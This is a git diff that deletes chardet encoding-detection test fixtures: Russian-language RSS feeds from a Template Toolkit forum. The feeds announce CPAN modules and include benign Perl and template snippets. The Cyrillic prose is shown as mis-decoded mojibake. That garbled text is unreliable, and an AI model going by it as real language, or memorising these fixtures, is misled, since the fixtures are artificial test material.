<webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט׀ׁכ ׂ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ֱ ½ׂכ ³װ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - ¿׳װא׀ׂןמ ׂבױו בױג״גױױ םג׃ ױׁלט׃, ׀װױמבל ױ׳׃, ב׀ג׀ ב ׀בגד״ׂט״ 2006 ׃װ! ¶ױ׀מ ׂכו גׂאחױב״ו דװ׀ח ״ ׀וװ. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL ׁײ׀ - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - ´ן ל׳ׂ׀גױױ ׁאד׳ױאׂ Mozilla בװױ׀ <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL ׁײד</a>. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - ½ױ א״וװ״ג װ װן ׳׀ׂױאטױ״ן אױ׃״בגא׀ז״״ - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - ·װא׀ׂבגׂדגױ!<br /> -<br /> -¼ױ ױ א״וװ״ג װ װן ׳׀ׂױאטױ״ן אױ׃״בגא׀ז״״ :(. ְױ׃״בגא״אׂ׀בן 2 א׀׳׀ ב א׀׳כ״ חג. ׀װאױב׀״, םההױג דױׂ :(. - - ½״׀ ². <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF בדײׁ׀ ׳׀׃ׂׂ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - ½׀ האדױ װׁ׀ׂױ׀ <span style="font-weight:bold">RDF בדײׁ׀ ׳׀׃ׂׂ</span>. ֽג׀ בדײׁ׀ ׃גׂ״ג ה׀כ ב ׳׀׃ׂ׀״ ׂכו גױ, גאכגכו ׂ האד׀ו, ׂ הא׀גױ XML/RDF. ֱ ילמ RDF בדײׁכ ײ א׃׀״׳ׂ׀גל װ״בד ׀ ׂכױ גױכ, גאכגכױ ׂ האד׀ו.<br /><br />² ׀בגןי״ ױג װבגדכ בױװדמי״ױ װ״ב״ <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">·׀בגׂ ב Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">½ׂבג״ Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">¾ׁבדײװױ״ױ האד׀</a>.<br /><br />´ן גבױײ״ׂ׀״ן ׂכו גױ ״ חגױ״ן ׳׀׃ׂׂ ײ ״בל׳ׂ׀גל בױז״׀לכױ א׃א׀כ ״ בדײׁכ, ׀א״ױא: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />¿ל׳ׂ׀גױ״ ׁאד׳ױא׀ <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (ׂױאב״״ 0.8 ״ בג׀אטױ) ג׀ײױ ׃דג ׀בגא״גל װ״בד חױאױ׳ <span style="font-weight:bold">Live Bookmark</span>. ´ן םג׃ דײ ׳׀ג״ ׂ ׂכׁא׀כ האד (׀א״ױא, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">½ׂבג״ Template Toolkit</a>). ² ״ײױ א׀ׂ ד׃ד ׁאד׳ױא׀ ןׂ״גבן ׳׀ח <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. ´בג׀גח יױדגל ׳׀חד ״ װׁ׀ׂ״גל װ״בד ׂ ׳׀׀װ״. ¿בױ םג׃ ׂ ׳׀׀װ׀ו ןׂ״גבן ׀׀ &quot;½ׂבג״ Template Toolkit&quot;, ׂ גא ױא״װ״חױב״ ׁדװדג ׁׂןגלבן ׳׀׃ׂ״ ׂכו גױ ׂ האדױ &quot;½ׂבג״ Template Toolkit&quot;. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - װ״בל [³בגל] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - ַג-ג ױ בׂבױ ןגױ גׂא״גבן.<br /> -¼ױן א׀ב׳׀ױג ב״בגױ׀ ׀ Light Elf, ״ בׁיױ״ן ױח׀מגבן ׀װ״בלמ [³בגל].<br /> -<br /> -ֽג ג׀ ׀װ? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - ¿אׁױכ ׂ בׁיױ״ןו - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - µבגל אױװײױ״ױ ױ דװ׀ןגל אׁױכ.<br /> -ב ״ו ילמ דװׁ הא׀ג״אׂ׀גל גױבג.<br /> -¾בׁױ װ. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - ´ׂ״ײ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - ֿ ױ בׂבױ ן. <br /> -ֽׁױ׀ בׂױאוד &quot;powered by [%TT2%]&quot; ׳׀ח׀ױג חג םגג האד בװױ׀ ׀ TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - ִאדכ גאכגכ - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ״מן 2004 ׃װ׀ גאכ״בל <span style="font-weight:bold">האדכ Template Toolkit</span>. ¿א״׃׀ט׀מ ׂבױו ״גױאױבדמי״ובן ״ ״בל׳דמי״ו ׂ א׀ׁגױ ׁ״ׁ״גױד Template Toolkit דח׀בג״מ.<br /><br />¼״ ׁ׀׃װ׀אבג״:<br /><br />´״גא״מ ½״׀ױׂד ׳׀ װװױאײד, א׀בבכד חױאױ׳ װ״בד Subscribe.Ru בג׀גל״ Template Toolkit, אױװבג׀ׂױ״ױ האד׀ <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - ·׀וװ״ ״ דח״בל</a> ׂ ׀חױבגׂױ האד׀ װװױאײ״ ב׀ג׀ <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (אדבב׀ן אױװ׀ז״ן)</a>.<br /><br />²׀װ״ד ֱדו׀ׂד ׳׀ װװױאײד ״ ״װױמ ב׳װ׀״ן םג״ו האדׂ.<br /><br />½׀װױמבל, חג האדכ בג׀דג ױ׳כ״ װן גױו, ג ״בל׳דױג ״״ בׁ״א׀ױגבן ״בל׳ׂ׀גל ׂ בׂ״ו א׀׳א׀ׁג׀ו ׁ״ׁ״גױד א׀ׁגױ ב ט׀ׁ׀״ Template Toolkit. ֱא׀ט״ׂ׀גױ, װױ״גױבל, ׁבדײװ׀גױ.<br /><br /><span style="font-weight:bold">ֱגאדגדא׀ האד׀ אױװׂ׀א״גױל׀ן</span>. ֿ ׃גׂ ׂכבדט׀גל ״ דחױבגל ׂבױ אױװײױ״ן ב׳װ׀״מ ׂכו ׂױג ׂ א׀׀ו האדׂ Template Toolkit.<br /><br />ֱ׀ האד ׀״ב׀ ב ״בל׳ׂ׀״ױ Template Toolkit ״ ׁדװױג װא׀ׁ׀גכׂ׀גלבן. ²בױ ׳׀ױח׀״ן ״ אױװײױ״ן א״ׂױגבגׂדמגבן. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.6.xml b/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.6.xml deleted file mode 100644 index ead8039..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - ִאדכ Template Toolkit : ½ׂבג״ Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - ׁכבגא׀ן, י׀ן ״ א׀בט״אןױ׀ן ב״בגױ׀ ׁא׀ׁג״ ט׀ׁׂ. ½׀ ב׀גױ א׀ׁג׀ױג האד, ׂ גא ׁבדײװ׀מגבן ׂאבכ ״בל׳ׂ׀״ן ׁ״ׁ״גױ״ א׀ׁגױ ב ט׀ׁ׀״. °בכ ״ ׂבג״, בׂן׳׀כױ ב Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט׀ׁכ ׂ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - ׳׀׃אד׳׀ ט׀ׁׂ ״׳ בױז״״ __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">װדן Template::Provider::FromDATA</a>, גאכ ׳ׂןױג וא׀״גל ט׀ׁכ ׂױבגױ ב װ ׂ װ ה׀ױ (בױז״ן __DATA__).<br /><br />´ן ״בל׳ׂ׀״ן װ׀׃ װדן ױׁוװ״ ׂ׀ח׀ױ ב׳װ׀גל ם׳ױןא אׂ׀װױא׀ Template::Provider::FromDATA, ׀ ׳׀גױ ד׀׳׀גל ױ׃ ׂ ׀חױבגׂױ בג׀ׂי״׀ ט׀ׁׂ ׂ בגאדגאױ Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# ֱ׳װ׀ס ׁךױג בג׀ׂי״׀ -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# ֳ׀׳כׂ׀ױ ׁךױג בג׀ׂי״׀ ׂ ז״ן בגאדגא׀ Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...ב׀״ ט׀ׁכ ׂ בױז״״ __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - דװ׀ױ״ױ HTML-גױ׃ׂ ״׳ גױבג׀ - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 0.01 װדן <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">װדן Template::Plugin::HTML::Strip</a>. ¼װדל אױװבג׀ׂןױג ׀׃״, גאכ ׳ׂןױג דװ׀ןגל ״׳ גױבג׀ HTML-גױ׃״.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - ׳׀ױ׀ גױבג׀ ב ילמ אױ׃דןאכו ׂכא׀ײױ״ - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - ½׀ CPAN דׁ״ׂ׀ <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">װדל Template::Plugin::Subst</a>, גאכ ׳ׂןױג ׂכןגל ׳׀ױכ ׂ גױבגױ ב ״בל׳ׂ׀״ױ אױ׃דןאכו ׂכא׀ײױ״.<br /><br />¸בל׳ׂ׀״ױ ׂ״אגד׀ל׃ ױגװ׀ <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'ט״ ׀ כ' %] -[% str.subst('(ט״|כ) ׀ (כ|ט״)', '$2 ׀ $1', 1) %]</pre></div><br /><br />¸בל׳ׂ׀״ױ ה״לגא׀<br /><div class="code"><pre>[% USE filt = Subst - pattern = '(ט״|כ) ׀ (כ|ט״)' - replacement = '$2 ׀ $1' - global = 1 %] -[% FILTER $filt %] -ט״ ׀ כ -[% END %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - ׂכׂװ גױבגׂכו ג׀ׁ״ז - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">װדן Template::Plugin::ASCIITable</a>, גאכ ׳ׂןױג א״בׂ׀גל גױבגׂכױ ג׀ׁ״זכ.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />²כׂװ:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />¿׀׃״ ׳ׂןױג ׀בגא׀״ׂ׀גל ׀א׀ױגאכ ג׀ׁ״זכ, ׀ ג׀ײױ ב׳װ׀ׂ׀גל בׁבגׂױכױ בג״״ א׀. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - םבאג אןװ׀ הדז״ Perl ׂ ט׀ׁכ - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - ½׀ CPAN דׁ״ׂ׀ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">װדל Template::Plugin::Perl</a>, אױװבג׀ׂןמי״ אןװ ױ׳כו הדז״ Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX הדז״״ ׂ ט׀ׁ׀ו - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - ½׀ CPAN דׁ״ׂ׀ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">װדל Template::Plugin::POSIX</a>. ¼װדל ׳ׂןױג ״בל׳ׂ׀גל ׂ ט׀ׁ׀ו הדז״״ POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - אױׁא׀׳ׂ׀״ױ ׂכׂװ׀ ׂ Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - ½׀ CPAN דׁ״ׂ׀ <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">װדל Template::Plugin::Decode</a>, גאכ אױװבג׀ׂןױג בבׁ אױװױגל בײבג״ ב ״בל׳ׂ׀״ױ ׂ ט׀ׁ׀ו UTF-8.<br /><br /><div class="code"><pre>²׀ח׀ױ [% USE Decode %]. -·׀גױ ײ ״בל׳ׂ׀גל ה״לגא 'decode'. -ֽגג ה״לגא אױׁא׀׳דױג בגאד ״׳ UTF-8 ׂ ׂדגאױ״ unicode-הא׀ג Perl: -[% multibyte_str | decode %]</pre></div><br />°ׂגא װדן אױװ׀׃׀ױג בױװדמי״ װוװ. ² ׀חױבגׂױ װ״אׂ״ ט׀ׁׂ ״בל׳דױגבן UTF-8. ִ׀כ װײכ בװױאײ׀גל BOM-׳׀״בל. ²בױ ׂוװכױ װ׀כױ װױװ״אדמגבן ה״לגא decode. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-אױׁא׀׳ׂ׀״ױ XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">װדן Template::Plugin::XSLT</a>, ׂ גא אױ׀״׳ׂ׀ ה״לגא, ׳ׂןמי״ א״׳ׂװ״גל XSLT-אױׁא׀׳ׂ׀״ן הא׀׃ױג׀ XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - ׂכװױױ״ױ BODY-בבג׀ׂןמיױ HTML-װדױג׀ - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">װדן Template::Plugin::NakedBody</a>. ´׀כ װדל אױ׀״׳דױג ה״לגא, גאכ ׂכװױןױג בװױאײ״ױ HTML-װדױג׀ ױײװד גױ׃׀״ &lt;BODY&gt; ״ &lt;/BODY&gt;. ÷׀ ׀״ב׀ ׂ װדױג׀ז״״ םג ׀׳כׂ׀ױגבן דװׁ א״ א׀ׁגױ ב װ״׳׀ױא׀״. ¿א״ ׂמחױ״״ װ׃גׂױכו ״״ װדױגׂ ױג ױׁוװ״בג״ װ״גױל אױװ׀ג״אׂ׀גל װדױג.<br /><br /><div class="code"><pre># included.html -# ² html-אױװ׀גאױ דװׁ א׀ׁג׀גל ב כ װדױג -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -ַגׁכ ׂ״װױגל א׀ׂ״ל םגג גױג דײכ ג׀ׁ״זכ בג״ױ. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -÷גױג ״בוװ׃ װדױג׀. -·׀גױ ׂמח׀ױגבן װדױג, װ׃גׂױכ װ״׳׀ױא. -[% INCLUDE included.html | NakedBody %] -¿אװײױ״ױ ״בוװ׃ װדױג׀. -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - ״גױאהױב בׂכ ב״בגױ׀ ט׀ׁׂ - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">ׂױאב״ן 0.04 װדן CGI::Application::Plugin::AnyTemplate</a>. ´׀כ װדל בװױאײ״ג ׁׁיױכ ״גױאהױב װן א׀ׁגכ ב מׁ ״׳ׂױבג ב״בגױ ט׀ׁׂ Perl (ׂ ׀בגןי״ ױג װװױאײ״ׂ׀מגבן <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> ״ <span style="font-weight:bold">Template Toolkit</span>) ״׳ א״ײױ״, ״בל׳דמי״ו ׂ ׀חױבגׂױ גאױא׀ CGI::Application. - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - ׂמחױ״ױ ט׀ׁׂ ׂ בא״ג - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - ½׀ CPAN דׁ״ׂ׀׀ ׂױאב״ן 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">װדן Inline::TT</a>, גאכ ׳ׂןױג ׂמח׀גל ט׀ׁכ ׂ בא״ג ב בוא׀ױ״ױ ׂ׳ײבג״ ױט״אׂ׀״ן ג״״אׂ׀כו ט׀ׁׂ.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# ״ױ׀ ׁׂ םבאג״אדמגבן ׀ הדז״״ -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - ׃ױױא׀ז״ן Ajax-װ׀ ׂ ט׀ׁ׀ו - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - ½׀ CPAN דׁ״ׂ׀׀ <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">ׂױאב״ן 0.01 װדן Template::Plugin::HTML::Prototype</a>. ´׀כ װדל אױװבג׀ׂןױג ״גױאהױב װדמ HTML::Prototype, גאכ בװױאײ״ג הדז״״ װן ׃ױױא׀ז״״ װ׀ <a target="_blank" href="http://prototype.conio.net/">Javascript-ׁ״ׁ״גױ״ Prototype</a>. Prototype ״בל׳דױגבן ׂ ח׀בגבג״ ׂ <span style="font-weight:bold">Ruby on Rails</span> ״ בװױאײ״ג ׁךױג-א״ױג״אׂ׀דמ אױ׀״׳׀ז״מ <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - װװױאײ׀ ױבל״ו ן׳כׂ ׂ ט׀ׁ׀ו - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - ½׀ CPAN 